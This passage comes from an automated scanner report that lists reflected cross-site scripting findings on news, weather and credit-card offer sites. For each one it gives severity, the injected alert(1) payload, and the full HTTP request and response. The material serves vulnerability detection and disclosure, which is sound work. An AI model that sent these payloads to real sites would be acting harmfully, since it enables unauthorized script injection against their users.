Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:42 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/xmlrpc.php86904\"><script>alert(1)</script>1d2a8825119?rsdfeed/" />
...[SNIP]...

1.404. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [lang parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dacc4"%3balert(1)//bc4341ec3d3 was submitted in the lang parameter. This input was echoed as dacc4";alert(1)//bc4341ec3d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=engdacc4"%3balert(1)//bc4341ec3d3&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:17:56 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n32), ms jfk-agg-n32 ( origin>CONN)
Cache-Control: max-age=3360
Expires: Thu, 03 Feb 2011 17:13:56 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
Type;
return ret;
}


RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=engdacc4";alert(1)//bc4341ec3d3&url=&video=&category=&logo=1&tStyle=normal&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=engdacc4";ale
...[SNIP]...

1.405. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [logo parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the logo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32db1"%3balert(1)//42b70526543 was submitted in the logo parameter. This input was echoed as 32db1";alert(1)//42b70526543 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=132db1"%3balert(1)//42b70526543&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:57 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n38), ms jfk-agg-n38 ( origin>CONN)
Cache-Control: max-age=3420
Expires: Thu, 03 Feb 2011 17:13:57 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=132db1";alert(1)//42b70526543&tStyle=normal&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=132db1";ale
...[SNIP]...

1.406. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [metric parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the metric request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2096f"%3balert(1)//1ba13126b12 was submitted in the metric parameter. This input was echoed as 2096f";alert(1)//1ba13126b12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=02096f"%3balert(1)//1ba13126b12&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:19:10 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n26), ms jfk-agg-n26 ( origin>CONN)
Cache-Control: max-age=3300
Expires: Thu, 03 Feb 2011 17:14:10 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
edAttrs["type"] = mimeType;
return ret;
}


RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=02096f";alert(1)//1ba13126b12&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=02096f";ale
...[SNIP]...

1.407. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [partner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the partner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37e8c"%3balert(1)//8d39e9c745 was submitted in the partner parameter. This input was echoed as 37e8c";alert(1)//8d39e9c745 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather37e8c"%3balert(1)//8d39e9c745&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:21 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n26), ms jfk-agg-n26 ( origin>CONN)
Cache-Control: max-age=3060
Expires: Thu, 03 Feb 2011 17:07:21 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3911


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
nversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather37e8c";alert(1)//8d39e9c745&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather37e8c";ale
...[SNIP]...

1.408. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [tStyle parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the tStyle request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2cc6"%3balert(1)//085e153a142 was submitted in the tStyle parameter. This input was echoed as c2cc6";alert(1)//085e153a142 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normalc2cc6"%3balert(1)//085e153a142&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:38 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n28), ms jfk-agg-n28 ( origin>CONN)
Cache-Control: max-age=3180
Expires: Thu, 03 Feb 2011 17:09:38 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normalc2cc6";alert(1)//085e153a142&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normalc2cc6";ale
...[SNIP]...

1.409. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4df0b"%3balert(1)//aada13118d6 was submitted in the target parameter. This input was echoed as 4df0b";alert(1)//aada13118d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self4df0b"%3balert(1)//aada13118d6 HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:19:31 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n8), ms jfk-agg-n8 ( origin>CONN)
Cache-Control: max-age=2760
Expires: Thu, 03 Feb 2011 17:05:31 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
"] = mimeType;
return ret;
}


RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self4df0b";alert(1)//aada13118d6&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self4df0b";ale
...[SNIP]...

1.410. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [theme parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the theme request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e337d"%3balert(1)//a1ece0aaeff was submitted in the theme parameter. This input was echoed as e337d";alert(1)//a1ece0aaeff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=cloudse337d"%3balert(1)//a1ece0aaeff&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:18:53 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n4), ms jfk-agg-n4 ( origin>CONN)
Cache-Control: max-age=3180
Expires: Thu, 03 Feb 2011 17:11:53 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
) ret.embedAttrs["type"] = mimeType;
return ret;
}


RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=cloudse337d";alert(1)//a1ece0aaeff&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=cloudse337d";ale
...[SNIP]...

1.411. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [zipcode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the zipcode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8162"%3balert(1)//ba94b6bb5ca was submitted in the zipcode parameter. This input was echoed as c8162";alert(1)//ba94b6bb5ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025c8162"%3balert(1)//ba94b6bb5ca&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:17:32 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n34), ms jfk-agg-n34 ( origin>CONN)
Cache-Control: max-age=2820
Expires: Thu, 03 Feb 2011 17:04:32 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
uginsPage;
if (mimeType) ret.embedAttrs["type"] = mimeType;
return ret;
}


RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025c8162";alert(1)//ba94b6bb5ca&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025c8162";ale
...[SNIP]...

1.412. http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ocresort.ocregister.com
Path:   /2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5ef3"><script>alert(1)</script>3b1abce3997 was submitted in the REST URL parameter 5. This input was echoed as b5ef3\"><script>alert(1)</script>3b1abce3997 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810b5ef3"><script>alert(1)</script>3b1abce3997/ HTTP/1.1
Host: ocresort.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:15:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://ocresort.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:15:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
alternate" type="application/rss+xml" title=" Page not found - Around Disney - www.ocregister.com" href="http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810b5ef3\"><script>alert(1)</script>3b1abce3997/feed/" />
...[SNIP]...

1.413. http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ocresort.ocregister.com
Path:   /2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f4a3"><script>alert(1)</script>ebc82fd6548 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8f4a3\"><script>alert(1)</script>ebc82fd6548 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/?8f4a3"><script>alert(1)</script>ebc82fd6548=1 HTTP/1.1
Host: ocresort.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:15:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://ocresort.ocregister.com/xmlrpc.php
Link: <http://ocresort.ocregister.com/?p=68810>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 78618


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
" title=" Disney parks renovate 9 attractions, other areas - Around Disney - www.ocregister.com" href="http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/?8f4a3\"><script>alert(1)</script>ebc82fd6548=1feed/" />
...[SNIP]...

1.414. http://offers.amexnetwork.com/portalext/inline/back_support_mock_ie.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://offers.amexnetwork.com
Path:   /portalext/inline/back_support_mock_ie.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 457ed'-alert(1)-'43bbf2ba26d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /portalext/inline/back_support_mock_ie.jsp?457ed'-alert(1)-'43bbf2ba26d=1 HTTP/1.1
Host: offers.amexnetwork.com
Proxy-Connection: keep-alive
Referer: http://offers.amexnetwork.com/selects/us/grid?categoryPath=/amexnetwork/category/Shoppinga21a4%22%3E%3Cscript%3Ealert(1)%3C/script%3E9146dd0abe&issuerName=us_prop&inav=menu_rewards_shopping
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Surrogate-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: Thu, 03 Feb 2011 15:39:08 GMT
Date: Thu, 03 Feb 2011 15:39:08 GMT
Connection: close
Content-Length: 125

<script>
function getLocation() {
return '457ed'-alert(1)-'43bbf2ba26d=1';
}

parent.reloadHashSemaphore=false;
</script>

1.415. http://offers.amexnetwork.com/selects/us/grid [categoryPath parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://offers.amexnetwork.com
Path:   /selects/us/grid

Issue detail

The value of the categoryPath request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a21a4"><script>alert(1)</script>9146dd0abe was submitted in the categoryPath parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /selects/us/grid?categoryPath=/amexnetwork/category/Shoppinga21a4"><script>alert(1)</script>9146dd0abe&issuerName=us_prop&inav=menu_rewards_shopping HTTP/1.1
Host: offers.amexnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Cache-Control: no-cache
Expires: Thu, 03 Feb 2011 14:22:55 GMT
Date: Thu, 03 Feb 2011 14:22:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 215250


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
   
   
                   
...[SNIP]...
10='';s.eVar10='';s.prop20='';s.eVar20='';
                                       switchSubCategory(this);

switchGrid('/PCOfferGridController/searchOffers.do?localLocale=en-us&categoryPath_last=/amexnetwork/category/Shoppinga21a4"><script>alert(1)</script>9146dd0abe&localCountryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&pocsort=2&countryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&issuerName=us_prop&categoryPath=/amexnetwork/category/Travel/Air');

return switc
...[SNIP]...

1.416. http://offers.amexnetwork.com/selects/us/grid [issuerName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://offers.amexnetwork.com
Path:   /selects/us/grid

Issue detail

The value of the issuerName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82cc0"%3balert(1)//5ac35aa2ed1 was submitted in the issuerName parameter. This input was echoed as 82cc0";alert(1)//5ac35aa2ed1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop82cc0"%3balert(1)//5ac35aa2ed1&inav=menu_rewards_shopping HTTP/1.1
Host: offers.amexnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Cache-Control: no-cache
Expires: Thu, 03 Feb 2011 14:28:36 GMT
Date: Thu, 03 Feb 2011 14:28:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 287293


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
   
   
                   
...[SNIP]...
